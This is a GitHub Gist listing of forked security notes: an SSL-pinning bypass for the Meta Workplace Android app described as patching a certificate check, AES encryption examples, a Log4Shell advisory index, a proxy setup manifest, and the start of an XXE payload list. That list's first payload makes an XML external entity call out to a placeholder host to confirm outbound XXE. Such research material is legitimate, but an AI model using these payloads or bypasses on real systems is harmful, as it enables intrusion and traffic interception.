Skip to content

Instantly share code, notes, and snippets.

@TrueNix
TrueNix / wokplace-ssl-pinning-bypass.md
Created September 26, 2023 11:50 — forked from xdavidhu/wokplace-ssl-pinning-bypass.md
Bypassing SSL Pinning in Facebook/Meta Workplace (Android)

Tested on Workplace for Android version 362.0.0.29.109. This approach might work in other Facebook/Meta applications. Thank you Imre Rad for helping me analyze the binary.

How does it work?

The Workplace Android app uses the Fizz open source TLS-1.3 library to communicate with the backend APIs. This library is written in C++, and is compiled to native code. It is running as a native library attached to the Android app.

The certificate verification is implemented in fizz/client/ClientProtocol.cpp, on line 1944. The easiest way to bypass this check is to patch the if (state.verifier()) { check on line 1942.

@TrueNix
TrueNix / aes_cryptojs_pycrypto.js
Created June 22, 2022 12:47 — forked from adrianlzt/aes_cryptojs_pycrypto.js
Interoperable CryptoJS (defaults) <-> PyCrypto
/*
* CryptoJS by default:
* - uses CBC mode
* - pkcs7 for padding
* - evpKDF to extract key
* - part of the key is used as IV
* - before converting to base64 it makes "Salt__"+salt+encrypted_text
*/
var CryptoJS = require('crypto-js');
@TrueNix
TrueNix / CryptoJS-AES.md
Created June 22, 2022 06:30 — forked from caiguanhao/CryptoJS-AES.md
CryptoJS AES encryption/decryption JavaScript and command line examples

You can run these commands to encrypt or decrypt a string:

Command

To encrypt:

printf "Lorem ipsum dolor sit amet, ..." | \
  openssl enc -e -base64 -A -aes-256-cbc -pass pass:"my-password"

To decrypt:

@TrueNix
TrueNix / 20211210-TLP-WHITE_LOG4J.md
Created December 14, 2021 07:31 — forked from SwitHak/20211210-TLP-WHITE_LOG4J.md
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-14 0006 UTC

Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great ressources

@TrueNix
TrueNix / AndroidManifest.xml
Created November 21, 2017 10:00 — forked from erkattak/AndroidManifest.xml
Android Application Setup for use with Charles Proxy
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:roundIcon="@mipmap/ic_launcher_round"
android:supportsRtl="true"
android:theme="@style/AppTheme"
android:networkSecurityConfig="@xml/network_security_config">
@TrueNix
TrueNix / XXE_payloads
Created August 29, 2017 11:19 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>